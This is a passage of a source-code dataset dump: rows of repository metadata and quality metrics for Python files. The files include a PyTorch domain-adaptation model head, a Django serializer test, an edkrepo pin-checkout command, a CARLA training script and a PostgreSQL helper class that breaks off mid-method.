hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | 
qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
df1c101105dbb3aa73b19593c5a7ea69af113861 | 3,710 | py | Python | models/base_model.py | weigq/UDA-1 | 4f97980980cafd0a2d02a77211ac7dbaf3e331f6 | [
"MIT"
] | 32 | 2021-11-08T15:45:30.000Z | 2022-03-30T09:08:57.000Z | models/base_model.py | weigq/UDA-1 | 4f97980980cafd0a2d02a77211ac7dbaf3e331f6 | [
"MIT"
] | 3 | 2021-11-16T02:38:51.000Z | 2022-02-21T13:29:58.000Z | models/base_model.py | weigq/UDA-1 | 4f97980980cafd0a2d02a77211ac7dbaf3e331f6 | [
"MIT"
] | 4 | 2021-11-09T02:53:18.000Z | 2021-12-21T22:11:35.000Z | # --------------------------------------------------------
# Copyright (c) 2021 Microsoft
# Licensed under The MIT License
# --------------------------------------------------------
import torch.nn as nn
from utils.torch_funcs import init_weights_fc, init_weights_fc0, init_weights_fc1, init_weights_fc2
__all__ = ['BaseModel']
class BaseModel(nn.Module):
def __init__(self,
num_classes: int = 1000,
                 hda: bool = False,      # whether to use the HDA head
                 toalign: bool = False,  # whether to use ToAlign
**kwargs
):
super().__init__()
self.num_classes = num_classes
self._fdim = None
# HDA
self.hda = hda
# toalign
self.toalign = toalign
def build_head(self):
# classification head
self.fc = nn.Linear(self.fdim, self.num_classes)
nn.init.kaiming_normal_(self.fc.weight)
if self.fc.bias is not None:
nn.init.zeros_(self.fc.bias)
# HDA head
if self.hda:
self.fc.apply(init_weights_fc)
self.fc0 = nn.Linear(self._fdim, self.num_classes)
self.fc0.apply(init_weights_fc0)
self.fc1 = nn.Linear(self._fdim, self.num_classes)
self.fc1.apply(init_weights_fc1)
self.fc2 = nn.Linear(self._fdim, self.num_classes)
self.fc2.apply(init_weights_fc2)
@property
def fdim(self) -> int:
return self._fdim
def get_backbone_parameters(self):
return []
def get_parameters(self):
parameter_list = self.get_backbone_parameters()
parameter_list.append({'params': self.fc.parameters(), 'lr_mult': 10})
if self.hda:
parameter_list.append({'params': self.fc0.parameters(), 'lr_mult': 10})
parameter_list.append({'params': self.fc1.parameters(), 'lr_mult': 10})
parameter_list.append({'params': self.fc2.parameters(), 'lr_mult': 10})
return parameter_list
def forward_backbone(self, x):
""" input x --> output feature """
return x
def _get_toalign_weight(self, f, labels=None):
        assert labels is not None, 'labels should be assigned'
w = self.fc.weight[labels].detach() # [B, C]
if self.hda:
w0 = self.fc0.weight[labels].detach()
w1 = self.fc1.weight[labels].detach()
w2 = self.fc2.weight[labels].detach()
w = w - (w0 + w1 + w2)
eng_org = (f**2).sum(dim=1, keepdim=True) # [B, 1]
eng_aft = ((f*w)**2).sum(dim=1, keepdim=True) # [B, 1]
scalar = (eng_org / eng_aft).sqrt()
w_pos = w * scalar
return w_pos
def forward(self, x, toalign=False, labels=None) -> tuple:
"""
return: [f, y, ...]
"""
f = self.forward_backbone(x) # output feature [B, C]
assert f.dim() == 2, f'Expected dim of returned features to be 2, but found {f.dim()}'
if toalign:
w_pos = self._get_toalign_weight(f, labels=labels)
f_pos = f * w_pos
y_pos = self.fc(f_pos)
if self.hda:
z_pos0 = self.fc0(f_pos)
z_pos1 = self.fc1(f_pos)
z_pos2 = self.fc2(f_pos)
z_pos = z_pos0 + z_pos1 + z_pos2
return f_pos, y_pos - z_pos, z_pos
else:
return f_pos, y_pos
else:
y = self.fc(f)
if self.hda:
z0 = self.fc0(f)
z1 = self.fc1(f)
z2 = self.fc2(f)
z = z0 + z1 + z2
return f, y - z, z
else:
return f, y
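# A minimal usage sketch (hypothetical subclass; the backbone, the `_fdim` value
# and the input shape are assumptions for illustration, not part of this file):
#
#     class ToyModel(BaseModel):
#         def __init__(self, **kwargs):
#             super().__init__(**kwargs)
#             self.flatten = nn.Flatten()
#             self._fdim = 784
#             self.build_head()
#
#         def forward_backbone(self, x):
#             return self.flatten(x)  # [B, 784]
#
#     model = ToyModel(num_classes=10, hda=True)
#     f, y, z = model(torch.rand(4, 1, 28, 28))  # with hda, forward returns (f, y - z, z)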
| 33.125 | 99 | 0.523181 | 473 | 3,710 | 3.902748 | 0.238901 | 0.029252 | 0.045504 | 0.03467 | 0.191766 | 0.145179 | 0.145179 | 0.128927 | 0.050921 | 0 | 0 | 0.026656 | 0.332615 | 3,710 | 111 | 100 | 33.423423 | 0.718901 | 0.093531 | 0 | 0.098765 | 0 | 0 | 0.044277 | 0 | 0 | 0 | 0 | 0 | 0.024691 | 1 | 0.098765 | false | 0 | 0.024691 | 0.024691 | 0.246914 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df1dccd9ff34ca962f5ad0f1937db2627fe3e1bb | 955 | py | Python | amaascore/parties/fund.py | amaas-fintech/amaas-core-sdk-python | bd77884de6e5ab05d864638addeb4bb338a51183 | [
"Apache-2.0"
] | null | null | null | amaascore/parties/fund.py | amaas-fintech/amaas-core-sdk-python | bd77884de6e5ab05d864638addeb4bb338a51183 | [
"Apache-2.0"
] | 8 | 2017-06-06T09:42:41.000Z | 2018-01-16T10:16:16.000Z | amaascore/parties/fund.py | amaas-fintech/amaas-core-sdk-python | bd77884de6e5ab05d864638addeb4bb338a51183 | [
"Apache-2.0"
] | 8 | 2017-01-18T04:14:01.000Z | 2017-12-01T08:03:10.000Z | from __future__ import absolute_import, division, print_function, unicode_literals
from amaascore.parties.company import Company
class Fund(Company):
def __init__(self, asset_manager_id, party_id, base_currency, description='', party_status='Active',
display_name='', legal_name='', url='',
addresses=None, comments=None, emails=None, links=None, references=None,
*args, **kwargs):
super(Fund, self).__init__(asset_manager_id=asset_manager_id, party_id=party_id, base_currency=base_currency,
description=description, party_status=party_status,
display_name=display_name, legal_name=legal_name, url=url,
addresses=addresses, comments=comments, emails=emails,
links=links, references=references,
*args, **kwargs)
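# Example construction (a sketch; the field values below are illustrative only):
#
#     fund = Fund(asset_manager_id=1, party_id='FUND-001', base_currency='USD',
#                 display_name='Example Fund')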
| 53.055556 | 117 | 0.60733 | 96 | 955 | 5.666667 | 0.40625 | 0.066176 | 0.077206 | 0.069853 | 0.134191 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.303665 | 955 | 17 | 118 | 56.176471 | 0.818045 | 0 | 0 | 0 | 0 | 0 | 0.006283 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.153846 | 0 | 0.307692 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df1f7424ab7fa292579e8d0035b5a3d3e34ed234 | 1,127 | py | Python | django_flex_user/tests/serializers/test_phone_token_serializer.py | ebenh/django-flex-user | efffb21e4ce33d2ea8665756334e2a391f4b5a72 | [
"MIT"
] | 1 | 2021-09-13T20:26:02.000Z | 2021-09-13T20:26:02.000Z | django_flex_user/tests/serializers/test_phone_token_serializer.py | ebenh/django-flex-user | efffb21e4ce33d2ea8665756334e2a391f4b5a72 | [
"MIT"
] | null | null | null | django_flex_user/tests/serializers/test_phone_token_serializer.py | ebenh/django-flex-user | efffb21e4ce33d2ea8665756334e2a391f4b5a72 | [
"MIT"
] | null | null | null | from django.test import TestCase
class TestPhoneTokenSerializer(TestCase):
"""
This class is designed to test django_flex_user.serializers.PhoneTokenSerializer
"""
def setUp(self):
from django_flex_user.models.user import FlexUser
self.user = FlexUser.objects.create_user(phone='+12025550001')
def test_serialize(self):
from django_flex_user.serializers import PhoneTokenSerializer
from rest_framework.test import APIRequestFactory
from django.urls import reverse
# Dummy request for serializer context and building absolute URI's
request = APIRequestFactory().get('/')
# Get phone token
phone_token = self.user.phonetoken_set.first()
# Make sure the serializer only exposes the data we want it to
serializer = PhoneTokenSerializer(phone_token, context={'request': request})
self.assertEqual(
serializer.data,
{
'name': '+*********01',
'uri': f'{request.build_absolute_uri(reverse("phone-token", args=(phone_token.id,)))}'
}
)
| 33.147059 | 102 | 0.652174 | 121 | 1,127 | 5.950413 | 0.504132 | 0.069444 | 0.058333 | 0.069444 | 0.061111 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015458 | 0.253771 | 1,127 | 33 | 103 | 34.151515 | 0.840666 | 0.19787 | 0 | 0 | 0 | 0 | 0.129797 | 0.08465 | 0 | 0 | 0 | 0 | 0.052632 | 1 | 0.105263 | false | 0 | 0.263158 | 0 | 0.421053 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df2229a266aa3449cafdcf8c1cb50cc3ad9193bc | 367 | py | Python | validation_messages.py | PaulinaKomorek/Order-Form | 7c56852e4367d6dd80fd9b500bf4e4ae4d4e06f6 | [
"MIT"
] | 1 | 2020-04-13T12:25:53.000Z | 2020-04-13T12:25:53.000Z | validation_messages.py | PaulinaKomorek/Order-Form | 7c56852e4367d6dd80fd9b500bf4e4ae4d4e06f6 | [
"MIT"
] | null | null | null | validation_messages.py | PaulinaKomorek/Order-Form | 7c56852e4367d6dd80fd9b500bf4e4ae4d4e06f6 | [
"MIT"
] | null | null | null | validation_messages = {
"en":
{
"e-mail": "Invalid e-mail address.",
"telephone": "Invalid telephone number.",
"code": "Invalid postal code."
},
"pl":
{
"e-mail": "Niewłaściwy adres e-mail.",
"telephone": "Niewłaściwy format numeru telefonu.",
"code": "Niewłaściwy format kodu pocztowego."
}
}
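# Example lookup (illustrative): a validator would pick the message by language
# code and field name, e.g.
#
#     validation_messages["en"]["e-mail"]  # -> "Invalid e-mail address."
#     validation_messages["pl"]["code"]    # -> "Niewłaściwy format kodu pocztowego."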
| 22.9375 | 59 | 0.544959 | 34 | 367 | 5.852941 | 0.558824 | 0.100503 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.297003 | 367 | 15 | 60 | 24.466667 | 0.771318 | 0 | 0 | 0 | 0 | 0 | 0.558583 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df22cf9c0f6508e6a9593a1891b29ac8e1818c64 | 637 | py | Python | python/1021_remove_outermost_parentheses.py | liaison/LeetCode | 8b10a1f6bbeb3ebfda99248994f7c325140ee2fd | [
"MIT"
] | 17 | 2016-03-01T22:40:53.000Z | 2021-04-19T02:15:03.000Z | python/1021_remove_outermost_parentheses.py | liaison/LeetCode | 8b10a1f6bbeb3ebfda99248994f7c325140ee2fd | [
"MIT"
] | null | null | null | python/1021_remove_outermost_parentheses.py | liaison/LeetCode | 8b10a1f6bbeb3ebfda99248994f7c325140ee2fd | [
"MIT"
] | 3 | 2019-03-07T03:48:43.000Z | 2020-04-05T01:11:36.000Z | class Solution:
def removeOuterParentheses(self, s: str) -> str:
stack = []
start = 0
primitives = []
# retrieve all the primitives
for index, letter in enumerate(s):
if letter == "(":
stack.append(letter)
else:
stack.pop()
if len(stack) == 0:
primitives.append(s[start:index+1])
start = index + 1
# strip the outermost parentheses
stripped = []
for primitive in primitives:
stripped.append(primitive[1:-1])
return "".join(stripped)
| 26.541667 | 55 | 0.486656 | 60 | 637 | 5.166667 | 0.533333 | 0.070968 | 0.070968 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016043 | 0.412873 | 637 | 23 | 56 | 27.695652 | 0.812834 | 0.092622 | 0 | 0 | 0 | 0 | 0.001742 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0 | 0 | 0.176471 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df234c85802f9c15bc9466661d8b752a7a594bd0 | 8,009 | py | Python | edkrepo/commands/checkout_pin_command.py | nate-desimone/edk2-edkrepo | a3f30d275afce0467a38b3d2e3194a710f8c0e22 | [
"BSD-2-Clause-Patent"
] | 4 | 2021-04-18T22:04:59.000Z | 2022-03-31T03:59:17.000Z | edkrepo/commands/checkout_pin_command.py | nate-desimone/edk2-edkrepo | a3f30d275afce0467a38b3d2e3194a710f8c0e22 | [
"BSD-2-Clause-Patent"
] | 19 | 2021-04-06T21:07:29.000Z | 2022-03-25T17:17:25.000Z | edkrepo/commands/checkout_pin_command.py | nate-desimone/edk2-edkrepo | a3f30d275afce0467a38b3d2e3194a710f8c0e22 | [
"BSD-2-Clause-Patent"
] | 9 | 2021-03-16T23:13:09.000Z | 2021-11-20T09:19:38.000Z | #!/usr/bin/env python3
#
## @file
# checkout_pin_command.py
#
# Copyright (c) 2017 - 2020, Intel Corporation. All rights reserved.<BR>
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
import os
from git import Repo
from edkrepo.commands.edkrepo_command import EdkrepoCommand, OverrideArgument, SourceManifestRepoArgument
import edkrepo.commands.arguments.checkout_pin_args as arguments
import edkrepo.commands.humble.checkout_pin_humble as humble
from edkrepo.common.common_cache_functions import get_repo_cache_obj
from edkrepo.common.common_repo_functions import sparse_checkout_enabled, reset_sparse_checkout, sparse_checkout
from edkrepo.common.common_repo_functions import check_dirty_repos, checkout_repos, combinations_in_manifest
from edkrepo.common.humble import SPARSE_CHECKOUT, SPARSE_RESET, SUBMODULE_DEINIT_FAILED
from edkrepo.common.edkrepo_exception import EdkrepoInvalidParametersException, EdkrepoProjectMismatchException
from edkrepo.common.workspace_maintenance.manifest_repos_maintenance import list_available_manifest_repos
from edkrepo.common.workspace_maintenance.manifest_repos_maintenance import find_source_manifest_repo
from edkrepo.config.config_factory import get_workspace_path, get_workspace_manifest
from edkrepo.config.tool_config import SUBMODULE_CACHE_REPO_NAME
from edkrepo_manifest_parser.edk_manifest import ManifestXml
from project_utils.submodule import deinit_full, maintain_submodules
import edkrepo.common.ui_functions as ui_functions
class CheckoutPinCommand(EdkrepoCommand):
def __init__(self):
super().__init__()
def get_metadata(self):
metadata = {}
metadata['name'] = 'checkout-pin'
metadata['help-text'] = arguments.COMMAND_DESCRIPTION
metadata['alias'] = 'chp'
args = []
metadata['arguments'] = args
args.append({'name' : 'pinfile',
'positional' : True,
'position' : 0,
'required' : True,
'help-text' : arguments.PIN_FILE_HELP})
args.append(OverrideArgument)
args.append(SourceManifestRepoArgument)
return metadata
def run_command(self, args, config):
workspace_path = get_workspace_path()
manifest = get_workspace_manifest()
manifest_repo = find_source_manifest_repo(manifest, config['cfg_file'], config['user_cfg_file'], args.source_manifest_repo)
cfg, user_cfg, conflicts = list_available_manifest_repos(config['cfg_file'], config['user_cfg_file'])
if manifest_repo in cfg:
manifest_repo_path = config['cfg_file'].manifest_repo_abs_path(manifest_repo)
elif manifest_repo in user_cfg:
manifest_repo_path = config['user_cfg_file'].manifest_repo_abs_path(manifest_repo)
else:
manifest_repo_path = None
pin_path = self.__get_pin_path(args, workspace_path, manifest_repo_path, manifest)
pin = ManifestXml(pin_path)
manifest_sources = manifest.get_repo_sources(manifest.general_config.current_combo)
check_dirty_repos(manifest, workspace_path)
for source in manifest_sources:
local_path = os.path.join(workspace_path, source.root)
repo = Repo(local_path)
origin = repo.remotes.origin
origin.fetch()
self.__pin_matches_project(pin, manifest, workspace_path)
sparse_enabled = sparse_checkout_enabled(workspace_path, manifest_sources)
if sparse_enabled:
ui_functions.print_info_msg(SPARSE_RESET, header = False)
reset_sparse_checkout(workspace_path, manifest_sources)
submodule_combo = pin.general_config.current_combo
try:
deinit_full(workspace_path, manifest, args.verbose)
except Exception as e:
ui_functions.print_error_msg(SUBMODULE_DEINIT_FAILED, header = False)
if args.verbose:
ui_functions.print_error_msg(e, header = False)
pin_repo_sources = pin.get_repo_sources(pin.general_config.current_combo)
try:
checkout_repos(args.verbose, args.override, pin_repo_sources, workspace_path, manifest)
manifest.write_current_combo(humble.PIN_COMBO.format(args.pinfile))
finally:
cache_path = None
cache_obj = get_repo_cache_obj(config)
if cache_obj is not None:
cache_path = cache_obj.get_cache_path(SUBMODULE_CACHE_REPO_NAME)
maintain_submodules(workspace_path, pin, submodule_combo, args.verbose, cache_path)
if sparse_enabled:
ui_functions.print_info_msg(SPARSE_CHECKOUT, header = False)
sparse_checkout(workspace_path, pin_repo_sources, manifest)
def __get_pin_path(self, args, workspace_path, manifest_repo_path, manifest):
if os.path.isabs(args.pinfile) and os.path.isfile(args.pinfile):
return os.path.normpath(args.pinfile)
elif manifest_repo_path is not None and os.path.isfile(os.path.join(manifest_repo_path, os.path.normpath(manifest.general_config.pin_path), args.pinfile)):
return os.path.join(manifest_repo_path, os.path.normpath(manifest.general_config.pin_path), args.pinfile)
elif manifest_repo_path is not None and os.path.isfile(os.path.join(manifest_repo_path, args.pinfile)):
return os.path.join(manifest_repo_path, args.pinfile)
elif os.path.isfile(os.path.join(workspace_path, args.pinfile)):
return os.path.join(workspace_path, args.pinfile)
elif os.path.isfile(os.path.join(workspace_path, 'repo', args.pinfile)):
return os.path.join(workspace_path, 'repo', args.pinfile)
        elif not os.path.isfile(os.path.join(workspace_path, args.pinfile)) and not os.path.dirname(args.pinfile):
            # os.path.dirname() returns '' (never None) for a bare filename.
            for dirpath, dirnames, filenames in os.walk(workspace_path):
                if args.pinfile in filenames:
                    return os.path.join(dirpath, args.pinfile)
            raise EdkrepoInvalidParametersException(humble.NOT_FOUND)
        else:
            raise EdkrepoInvalidParametersException(humble.NOT_FOUND)
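    # Lookup order used above (descriptive summary): absolute path, then the
    # manifest repo's configured pin directory, then the manifest repo root,
    # then the workspace root, then the workspace's 'repo' directory, and
    # finally a recursive walk of the workspace for a bare filename.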
def __pin_matches_project(self, pin, manifest, workspace_path):
if pin.project_info.codename != manifest.project_info.codename:
raise EdkrepoProjectMismatchException(humble.MANIFEST_MISMATCH)
elif not set(pin.remotes).issubset(set(manifest.remotes)):
raise EdkrepoProjectMismatchException(humble.MANIFEST_MISMATCH)
elif pin.general_config.current_combo not in combinations_in_manifest(manifest):
ui_functions.print_warning_msg(humble.COMBO_NOT_FOUND.format(pin.general_config.current_combo), header = False)
combo_name = pin.general_config.current_combo
pin_sources = pin.get_repo_sources(combo_name)
pin_root_remote = {source.root:source.remote_name for source in pin_sources}
try:
# If the pin and the project manifest have the same combo get the
# repo sources from that combo. Otherwise get the default combo's
# repo sources
manifest_sources = manifest.get_repo_sources(combo_name)
except ValueError:
manifest_sources = manifest.get_repo_sources(manifest.general_config.default_combo)
manifest_root_remote = {source.root:source.remote_name for source in manifest_sources}
if set(pin_root_remote.items()).isdisjoint(set(manifest_root_remote.items())):
raise EdkrepoProjectMismatchException(humble.MANIFEST_MISMATCH)
pin_root_commit = {source.root:source.commit for source in pin_sources}
for source in pin_sources:
source_repo_path = os.path.join(workspace_path, source.root)
repo = Repo(source_repo_path)
if repo.commit(pin_root_commit[source.root]) is None:
raise EdkrepoProjectMismatchException(humble.NOT_FOUND)
| 55.618056 | 164 | 0.710326 | 972 | 8,009 | 5.547325 | 0.169753 | 0.025593 | 0.022255 | 0.024666 | 0.393361 | 0.301187 | 0.259829 | 0.217915 | 0.188242 | 0.125556 | 0 | 0.001747 | 0.213635 | 8,009 | 143 | 165 | 56.006993 | 0.854398 | 0.038457 | 0 | 0.083333 | 0 | 0 | 0.021071 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.041667 | false | 0 | 0.141667 | 0 | 0.25 | 0.041667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df24d31f00fafdf9649aee8146b7fac334d4cd87 | 634 | py | Python | multiple_futures_prediction/cmd/train_carla_cmd.py | cpacker/multiple-futures-prediction-carla | dfc97ab6d55976f86509883c7541b0920266472e | [
"AML"
] | 6 | 2021-07-29T03:36:50.000Z | 2022-03-07T21:13:25.000Z | multiple_futures_prediction/cmd/train_carla_cmd.py | cpacker/multiple-futures-prediction-carla | dfc97ab6d55976f86509883c7541b0920266472e | [
"AML"
] | 1 | 2021-11-04T14:31:58.000Z | 2021-11-25T07:42:54.000Z | multiple_futures_prediction/cmd/train_carla_cmd.py | cpacker/multiple-futures-prediction-carla | dfc97ab6d55976f86509883c7541b0920266472e | [
"AML"
] | 1 | 2021-08-11T08:36:54.000Z | 2021-08-11T08:36:54.000Z | from typing import List, Set, Dict, Tuple, Optional, Union, Any
from multiple_futures_prediction.train_carla import train, Params
import gin
import argparse
def parse_args() -> Any:
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--config', type=str, default='')
return parser.parse_args()
def main() -> None:
args = parse_args()
gin.parse_config_file(args.config)
params = Params()()
train(params)
# python -m multiple_futures_prediction.cmd.train_carla_cmd --config multiple_futures_prediction/configs/mfp2_carla.gin
if __name__ == '__main__':
main()
| 31.7 | 119 | 0.774448 | 82 | 634 | 5.682927 | 0.52439 | 0.096567 | 0.160944 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001783 | 0.115142 | 634 | 19 | 120 | 33.368421 | 0.828877 | 0.184543 | 0 | 0 | 0 | 0 | 0.031068 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0.266667 | 0 | 0.466667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df250a4194a7dab451b6efac9277905f30e795d0 | 9,263 | py | Python | DynamicETLDashboard/DynamicETL_Dashboard/Database/postgres.py | BRutan/DynamicETLDashboard | 8a40e6f51e53f084d6103ba41cd675916505652f | [
"MIT"
] | null | null | null | DynamicETLDashboard/DynamicETL_Dashboard/Database/postgres.py | BRutan/DynamicETLDashboard | 8a40e6f51e53f084d6103ba41cd675916505652f | [
"MIT"
] | null | null | null | DynamicETLDashboard/DynamicETL_Dashboard/Database/postgres.py | BRutan/DynamicETLDashboard | 8a40e6f51e53f084d6103ba41cd675916505652f | [
"MIT"
] | null | null | null | #####################################
# Database/postgres.py
#####################################
# Description:
# * Objects related to interacting
# with SQL database that uses PostGres
# as SQL flavor language.
from Database.base import DBInterface, TableObject
from Database.columnattributes import ColumnAttributesGenerator
from pandas import read_csv, DataFrame, Series
import psycopg2
import os
class PostGresInterface(DBInterface):
"""
* Interface into PostGRES SQL database.
"""
def __init__(self, dbname, user, password):
"""
* Initiate new connection.
"""
        connect = psycopg2.connect('dbname=%s user=%s password=%s' % (dbname, user, password))
super().__init__(connect)
##############
# Properties:
##############
##############
# Interface Methods:
##############
def Execute(self, query, returnsvals = False):
"""
        * Execute a SQL query.
Inputs:
* query: string SQL query.
Optional:
* returnsvals: Put True if expecting query to return
values.
"""
errs = []
if not isinstance(query, str):
errs.append('query must be a string.')
if not isinstance(returnsvals, bool):
errs.append('returnsvals must be a boolean.')
if errs:
raise ValueError(','.join(errs))
        try:
            cursor = self.Cursor
            cursor.execute(query)
            # psycopg2's execute() returns None, so fetch explicitly when the
            # caller expects rows back.
            if returnsvals:
                return cursor.fetchall()
        except Exception as ex:
            raise RuntimeError('Failed to execute. Reason: %s' % str(ex))
def GetAllTableAttributes(self, schema = None, table = None):
"""
* Return table attributes for schema.
Optional:
* schema: Name of specific schema (string).
* table: Name of specific table (string).
"""
if not schema is None and not isinstance(schema, str):
raise ValueError('schema must be a string if provided.')
        query = ['SELECT * FROM information_schema.columns']
        conditions = []
        if schema is not None:
            conditions.append("table_schema = '%s'" % schema)
        if table is not None:
            conditions.append("table_name = '%s'" % table)
        if conditions:
